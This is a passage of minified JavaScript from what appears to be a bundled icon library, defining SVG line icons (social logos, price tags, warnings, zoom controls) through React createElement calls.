1v-1"})),messege_comment_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2Z"})),messege_comment_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 12a9 9 0 1 1 9 9H3v-9Zm6-1.5h6m-6 3h6"})),messege_comment_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 16a4 4 0 0 1-4 4H2v-6a4 4 0 0 1 4-4"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 9a5 5 0 0 1 5-5h6a5 5 0 0 1 5 5v7H11a5 5 0 0 1-5-5V9Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 8.5h4m-4 3h6"})),messege_comment_7_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20c5.523 0 10-3.806 10-8.5S17.523 3 12 3 2 6.806 2 11.5c0 2.78 1.571 5.25 4 6.8v3.2l3.211-1.835A11.66 11.66 0 0 0 12 20Zm-3-9.5h6m-5 3h4"})),messege_comment_8_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 18.703c-4.142 0-7.5-3.292-7.5-7.352C7 7.291 10.358 4 14.5 4c4.142 0 7.5 3.291 7.5 7.351 0 2.405-1.178 4.54-3 5.882V20l-2.408-1.587a7.645 7.645 0 0 1-2.092.29Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.352 5.55A7.131 7.131 0 0 0 8.5 5.5C4.91 5.5 2 8.174 2 11.473c0 1.954 1.021 3.69 2.6 4.779V18.5l2.087-1.29a7.04 7.04 0 0 0 2.813.166c.169-.024.336-.054.5-.09"})),messenger_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12c0 1.834.494 3.553 1.355 5.03L2 22l4.818-1.445A9.954 9.954 0 0 0 12 22Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m7 13.75 3-3 3.5 3 3.5-3.5"})),microsoft_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm9-2v18m-9-9h18"})),middle_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M8 21h8M3 15h18M8 9h8"})),mobile_smartphone_phone_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17 2H7a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6.5 3h3"})),pause_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h2.5a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm11.5 0a2 2 0 0 1 2-2H19a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-2.5a2 2 0 0 1-2-2V5Z"})),pinterest_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 11 8 21m1.818-4.5A5 5 0 1 0 7.416 14"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"})),play_media_video_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.522 0 10 4.477 10 10s-4.478 10-10 10C6.477 22 2 17.523 2 12S6.477 2 12 2Z",clipRule:"evenodd"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m16 12-6-4v8l6-4Z"})),price_tag_label_category_sale_discount_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.328 2.5H20.5a1 1 0 0 1 1 1v8.172a2 2 0 0 1-.586 1.414l-8 8a2 2 0 0 1-2.829 0l-7.171-7.172a2 2 0 0 1 0-2.828l8-8a2 2 0 0 1 1.414-.586Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 13 3 3"})),price_tag_offer_sale_coupon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.5h-3.672a2 2 0 0 0-1.414.586l-6.5 6.5a2 2 0 0 0 0 2.828l6.171 6.172a2 2 0 0 0 2.829 0l6.5-6.5A2 2 0 0 0 20 13.672V6.5a1 1 0 0 0-1-1h-.5M8 14.5l3 3m-.5-4.5 2 2"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 9c4.5-2.5 1.655-7.99-2.766-6.817-2.752.73-5.916 1.27-9.234 0"})),reddit_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M12 9c-4.97 0-9 2.91-9 6.5S7.03 22 12 22s9-2.91 9-6.5S16.97 9 12 9Zm0 0V6a2 2 0 0 1 2-2h3m3.506 9.37a2.25 2.25 0 1 0-2.856-2.93M17 4a2 2 0 1 0 4 0 2 2 0 0 0-4 0ZM3.494 13.37a2.25 2.25 0 1 1 2.856-2.93"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M8.5 16.75c1.5 1.5 5.5 1.5 7 0M15 13h.01M9 13h.01"})),refresh_reset_cycle_loop_infinity_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M21 12a9 9 0 0 1-17 4.127M3 12a9 9 0 0 1 17-4.127M20 3v5h-5M4 21v-5h5"})),restriction_no_stop_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 19 19 5"})),right_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18m-8 18h8M3 15h18m-8-6h8"})),right_triangle_angle_play_arrow_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.933 12.8a1 1 0 0 0 0-1.6L8.6 4.2A1 1 0 0 0 7 5v14a1 1 0 0 0 1.6.8l9.333-7Z"})),search_magnify_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm10 2-4.35-4.35"})),settings_tool_function_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.55 2.778A1 1 0 0 1 10.523 2h2.953a1 1 0 0 1 .975.778l.355 1.562a2 2 0 0 0 2.538 1.468l1.627-.5a1 1 0 0 1 1.155.447l1.456 2.464a1 1 0 0 1-.193 1.253l-1.16 1.04a2 2 0 0 0 0 2.978l1.16 1.038a1 1 0 0 1 .193 1.254l-1.456 2.464a1 1 0 0 1-1.155.447l-1.627-.5a2 2 0 0 0-2.538 1.468l-.355 1.56a1 1 0 0 1-.976.779h-2.952a1 1 0 0 1-.975-.778l-.355-1.562a2 2 0 0 0-2.538-1.468l-1.628.5a1 1 0 0 1-1.154-.446l-1.456-2.464a1 1 0 0 1 .193-1.254l1.16-1.038a2 2 0 0 0 0-2.979L2.61 9.472a1 1 0 0 1-.194-1.253l1.456-2.464a1 1 0 0 1 1.155-.447l1.628.5A2 2 0 0 0 9.194 4.34l.355-1.562Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"})),share_social_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.968 10.591a3.15 3.15 0 1 0 0 2.818m0-2.818c.212.424.332.902.332 1.409s-.12.985-.332 1.409m0-2.818 7.013-3.507M8.968 13.41l7.013 3.507m0-9.832a2.7 2.7 0 1 0 4.637-2.769 2.7 2.7 0 0 0-4.637 2.77Zm0 9.832a2.7 2.7 0 1 0 4.637 2.769 2.7 2.7 0 0 0-4.637-2.77Z"})),shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"})),skype_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 3c-.415 0-.823.028-1.223.082a5.5 5.5 0 0 0-7.695 7.695 9 9 0 0 0 10.14 10.14 5.5 5.5 0 0 0 7.695-7.695A9 9 0 0 0 12 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 10c0-1-1-2-3-2s-3 1-3 2c0 2.5 6 1.5 6 4 0 1-1 2-3 2s-3-1-3-2"})),smile_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8.5V10m7-1.5V10m-8.271 4a5.002 5.002 0 0 0 9.542 0"})),social_community_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.632 5.032a8.446 8.446 0 0 1 5.79 8.024 8.5 8.5 0 0 1-.18 1.74M9.368 5.031a8.446 8.446 0 0 0-5.79 8.024c.001.596.063 1.178.18 1.74m13.915 4.5c.458.387 1.05.62 1.695.62A2.635 2.635 0 0 0 22 17.279a2.635 2.635 0 0 0-2.632-2.64 2.635 2.635 0 0 0-2.631 2.64c0 .81.364 1.534.936 2.018Zm0 0A8.378 8.378 0 0 1 12 21.5a8.378 8.378 0 0 1-5.673-2.204m0 0a2.636 2.636 0 0 0 .936-2.018 2.635 2.635 0 0 0-2.631-2.64A2.635 2.635 0 0 0 2 17.279a2.635 2.635 0 0 0 2.632 2.639c.645 0 1.237-.234 1.695-.62ZM14.632 5.14A2.635 2.635 0 0 1 12 7.778a2.635 2.635 0 0 1-2.632-2.64A2.635 2.635 0 0 1 12 2.5a2.635 2.635 0 0 1 2.632 2.639Z"})),square_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"})),star_rating_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.579",d:"M11.016 3.125c.387-.833 1.58-.833 1.968 0l2.136 4.602c.158.34.482.573.856.617l5.067.597c.918.108 1.286 1.233.608 1.856l-3.748 3.444a1.07 1.07 0 0 0-.326.998l.994 4.974c.18.9-.785 1.595-1.592 1.147l-4.45-2.475a1.09 1.09 0 0 0-1.059 0L7.02 21.36c-.806.448-1.771-.247-1.591-1.147l.994-4.974a1.07 1.07 0 0 0-.326-.998l-3.749-3.444c-.677-.623-.309-1.748.609-1.856l5.067-.597c.374-.044.698-.278.856-.617l2.136-4.602Z"})),stopwatch_reading_time_timer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 13a9 9 0 1 1-18 0 9 9 0 0 1 18 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 7.5V13l3.5 2.5M12 4V1.5m-2 0h4M21 6l-2-2"})),tablet_ipad_pad_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6 3h.01"})),tag_bookmark_save_favourite_mark_discount_sale_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 4v18l6.8-5.1a2 2 0 0 1 2.4 0L20 22V4a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2Z"})),tiktok_logo_icon_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),tiktok_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),triangle_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997Z"})),triangle_shape_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20 12 3l10 17H2Z"})),twitter_x_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),upload_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 21v-8m0 0-2.5 2.5M12 13l2.5 2.5"})),view_count_show_visible_eye_open_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a5 5 0 1 0 0-10 5 5 0 0 0 0 10Z"})),view_count_show_visible_eye_open_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a3 3 0 1 0 0-6 3 3 0 0 0 0 6Z"})),view_count_show_visible_eye_open_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12c6-8.667 16-8.667 22 0-6 8.667-16 8.667-22 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 12a6 6 0 1 1-12 0 6 6 0 0 1 12 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 12a3 3 0 0 0-3-3"})),view_count_show_visible_eye_open_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 9c-1.996-3.913-6-6-10-6S3.996 5.087 2 9"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21a7 7 0 0 0 6.308-10.038 2.5 2.5 0 1 1-3.27-3.27A7 7 0 1 0 12 21Z"})),view_count_show_visible_eye_open_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 17a5 5 0 0 0 5-5h-5V7a5 5 0 0 0 0 10Z"})),warning_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12s4.477 10 10 10Zm0-14v4.5m0 3v.5"})),warning_triangle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997ZM12 9v4.5m0 3v.5"})),whatsapp_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.806 14.02c-.849-.282-1.532-.824-1.768-1.06-.236-.235-.778-.919-1.06-1.767l1.202-1.91L9.553 5.96c-.943 0-3.04.778-3.323 3.323-.283 2.546 1.532 5.068 2.475 6.01.942.944 3.464 2.759 6.01 2.476 2.546-.283 3.323-2.381 3.323-3.324l-3.323-1.626-1.91 1.202Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10a9.953 9.953 0 0 1-5.183-1.446L2 22l1.445-4.818A9.953 9.953 0 0 1 2 12C2 6.477 6.477 2 12 2Z"})),wordpress_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 7.454H3.818"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Zm-6.137 9.318 5.228-13.636m-3.864 9.772-4.09-10m-3.41 0 5.455 13.864"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.117 17.322 6.09 7.454H3.223m-.303.605 5.217 13.26"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.045 7.454h5M8.59 21.318l3.183-8.409M19.5 5.41h-.334a2.273 2.273 0 0 0-2.123 3.083l1.775 4.643"})),youtube_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10 15V9l5 3-5 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.193 4.352c-3.627-.47-10.402-.47-14.213.004-1.456.18-2.57 1.446-2.757 3.168-.297 2.719-.297 6.233 0 8.952.188 1.722 1.301 2.988 2.757 3.168 3.811.473 10.586.475 14.213.004 1.36-.177 2.375-1.365 2.562-2.972.327-2.811.327-6.541 0-9.352-.187-1.607-1.202-2.795-2.562-2.972Z"})),full_screen_corners_out_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.5V5C3 3.89543 3.89543 3 5 3H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 15.5V19C3 20.1046 3.89543 21 5 21H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 8V5C21 3.89543 20.1046 3 19 3H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 15.5V19C21 20.1046 20.1046 21 19 21H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_in_magnifying_glass_plus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10.995 8V14M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_out_magnifying_glass_minus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plugin_connect_socket_integration_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21.5 2.5L18.5 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18 12.9999L20.5858 10.4142C21.3668 9.63311 21.3668 8.36678 20.5858 7.58573L16.4142 3.41416C15.6332 